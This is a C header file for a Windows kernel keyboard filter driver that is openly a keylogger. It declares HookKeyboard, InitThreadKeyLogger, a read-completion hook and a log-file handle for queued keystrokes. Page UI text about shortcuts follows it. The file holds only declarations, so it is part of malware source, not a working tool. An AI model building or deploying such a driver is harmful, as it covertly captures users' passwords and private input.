📄 kbhook.h
字号:
#include "ntddk.h"
#include "kbdmou.h"
#include "ntddkbd.h"
#include "ntdd8042.h"
typedef struct _KEY_STATE
{
BOOLEAN kSHIFT;
BOOLEAN kCAPSLOCK;
BOOLEAN kCTRL;
BOOLEAN kALT;
}KEY_STATE;
typedef struct _DEVICE_EXTENSION
{
PDEVICE_OBJECT pKeyboardDevice;
//PDEVICE_OBJECT pControlDevice;
PETHREAD pThreadObject;
BOOLEAN bThreadTerminate;
HANDLE hLogFile;
KEY_STATE kState;
KSEMAPHORE semQueue;
KSPIN_LOCK lockQueue;
LIST_ENTRY QueueListHead;
}DEVICE_EXTENSION,*PDEVICE_EXTENSION;
/*
typedef struct KEYBOARD_INPUT_DATA{
USHORT UnitId;
USHORT MakeCode;
USHORT Flags;
USHORT Reserved;
ULONG ExtraInformation;
}KEYBOARD_INPUT_DATA,*PKEYBOARD_INPUT_DATA;
*/ //在ntddkbd.h中定义
typedef struct KEY_DATA{
char KeyData;
char KeyFlags;
LIST_ENTRY ListEntry;
}KEY_DATA;
//////////////////////////////////////////////////////////////////////////////////////////
//PDEVICE_EXTENSION pKeyboardDeviceExtension;
/////////////////////////////////////////////////////////////////////////////////////////
NTSTATUS HookKeyboard(IN PDRIVER_OBJECT theDriverObject);
NTSTATUS InitThreadKeyLogger(IN PDRIVER_OBJECT theDriverObject);
NTSTATUS DispatchPassDown(IN PDEVICE_OBJECT theDeviceObject,IN PIRP pIrp);
NTSTATUS DispatchRead(IN PDEVICE_OBJECT theDeviceObject,IN PIRP pIrp);
VOID OnUnload( IN PDRIVER_OBJECT DriverObject );
VOID ThreadKeyLogger(IN PVOID pContext);
NTSTATUS OnReadCompletion(IN PDEVICE_OBJECT theDeviceObject,IN PIRP pIrp,IN PVOID Context);
//VOID ConvertScanCodeToKeyCode(PDEVICE_EXTENSION pDevExt, KEY_DATA* kData, char* keys);
//////////////////////////////////////////////////////////////////////////////////////////⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -